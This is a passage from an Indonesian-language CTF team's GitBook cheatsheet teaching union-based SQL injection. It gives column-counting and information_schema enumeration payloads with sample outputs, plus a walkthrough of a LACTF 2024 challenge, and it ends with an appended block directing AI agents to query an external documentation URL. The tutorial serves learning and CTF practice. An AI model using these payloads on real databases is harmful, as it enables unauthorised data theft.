# sql injection

Cheatsheet sql injection

| Materi                                                           | Intro                                                                                                      |
| ---------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- |
| [#sql-injection](#sql-injection "mention")                       | Pembahasaan Sql Injection dari basic sampai advanced                                                       |
| [#nosql-injection](#nosql-injection "mention")                   | Pembahasan basic nosqlinjection seperti mongodb , cassandra , graphql dan banyak lagi                      |
| <p><a data-mention href="#cheatsheet">#cheatsheet</a></p><p></p> | List cheatshee sql maupun nosql seperti syntax2 yang sering digunakan dan juga tools yang sering digunakan |

## SQL Injection

### Basic SQL Injection Retreive Data on Another Tables

{% hint style="info" %}
pada materi ini akan dibahas sql injection pada select statement
{% endhint %}

example easy vulnerable code :&#x20;

```java
txtUserId = getRequestString("UserId");
// or whatever input that not sanitized can from requests query or body form or etc
txtSQL = "SELECT * FROM lulus WHERE id = " + txtUserId;
```

* Jadi txtUserId Langsung di input pake + tanpa di filter terlebih dahulu
* Jadi kita bisa mengleak semua id / table lain bahkan bisa sampai rce jika mysql nya memiliki permission ( into outfile )

Misal kita disuruh leak username dan password dari table Users nya jadi payloadnya adalah

pertama kita cek total tablesnya agar bisa meng enumerate nama db,table dll buat mengquerynya

```sql
1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #False
```

{% hint style="info" %}
dalam materi dibawah kita akan mempelejari cara memanfaatkan information\_schema untuk mengleak suatu informasi dalam database
{% endhint %}

disini saya biasanya sering pake group by, tapi kalian bisa pake UNION SELECT, ORDER BY u

Jadi totalnya ada 3 column langsung aja kita query pake UNION SELECT

```sql
1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
```

jadi server ngebaca nya gini

```sql
select * 
from lulus 
where id = 1 
UNION 
SELECT NULL,NULL,gRoUp_cOncaT(0x7c,schema_name,0x7c) 
fRoM information_schema.schemata
```

dan output nya adalah nama database yang ada di server dan juga id = 1 dari table lulus

```
+------+--------------+-----------------------------------------------------------------------------------------+
| id   | id_pendaftar | nama                                                                                    |
+------+--------------+-----------------------------------------------------------------------------------------+
|    1 | 123          | Huna                                                                                    |
| NULL | NULL         | |information_schema|,|mysql|,|ctf|,|performance_schema|,|sys| |
+------+--------------+-----------------------------------------------------------------------------------------+
```

lgsg muncul tuh database ctf, lgsg aja kita query untuk apa aja si table yang ada di database ctf itu menggunakan concat table\_name seperti ini&#x20;

```sql
1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,table_name,0x7c) fRoM information_schema.tables where table_schema='ctf';
```

output :

```
+------+--------------+--------------------+
| id   | id_pendaftar | nama               |
+------+--------------+--------------------+
|    1 | 123          | Huna               |
| NULL | NULL         | |lulus|,|flag_123| |
+------+--------------+--------------------+
```

kita tau ada table flag lgsg kita  akses, tapi kita gatau columnya apa . kita bisa query dengan payload seperti ini&#x20;

```sql
select * from lulus where id = 1 UNION SELECT NULL,NULL,gRoUp_cOncaT(0x7c,column_name,0x7c) fRoM information_schema.columns where table_name='flag_123';
```

output

```sql
+------+--------------+------------+
| id   | id_pendaftar | nama       |
+------+--------------+------------+
|    1 | 123          | Huna       |
| NULL | NULL         | |flag_321| |
+------+--------------+------------+
```

nah kita tau ada column flag\_321 aja lgsg aja kita query kan coy kaya gini

```sql
1 UNION SELECT NULL,NULL,flag_321  from flag_123;
```

dan dapet deh flagnya

```
+------+--------------+---------------------------------------+
| id   | id_pendaftar | nama                                  |
+------+--------------+---------------------------------------+
|    1 | 123          | Huna                                  |
| NULL | NULL         | N2L{lulus_akademi_ctf} |
+------+--------------+---------------------------------------+
```

mungkin untuk real case outputnya gakan kaya gitu. sesuaiin aja tapi mirip2 kok pasti

#### Example chall

refferensi : lactf 2024 la-housing-portal

download :&#x20;

{% file src="/files/yUABhu13c0V0ekt4NPCV" %}

> Kerjain dulu nnti kalo stuck baru liat sini lagi hehehe..&#x20;

vulnerable code :&#x20;

```python
query = """
    select * from users where {} LIMIT 25;
    """.format(
        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()])
    )
```

prefs.item() ga di filter kita lgsg bisa masukin ' pada variable v yg abis di iterate itu ( v itu adalah value dari nama requests form kita jadi misal ada name=asw v nya itu name = 'asw' gitu. lgsg aja payloadnya kita dpt lihat dari tas bisa inject ' untuk nutup stringnya jadi :  &#x20;

```sql
' UNION SELECT 1,1,1,1,1,flag FROM flag where '
```

dibaca server jadi :

```
select * from users where any = '' 
UNION SELECT 1,1,1,1,1,flag FROM flag where '1' LIMIT 25;
```

nah kenapa pake ' nah karna commentnya di blacklist jadi nanti error kalo cuman&#x20;

```
elect * from users where any = '' 
UNION SELECT 1,1,1,1,1,flag FROM flag ' LIMIT 25;
```

nah karna ada ' sebelom limit , fix nya pake true condition '1 atau bisa '1'='1 atau true condition yg lain.

dan gmn tau table flagnya? ada di function get\_flag select \* from flag untuk enumerasi atau jg bisa enumerasi total nama database,colum yg ada pake method diatas.

### Blind SQL Injection

soon

## NOSQL Injection

## Cheatsheet


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://n2l-cysec.gitbook.io/notes/cheatsheet/web-exploitation/sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.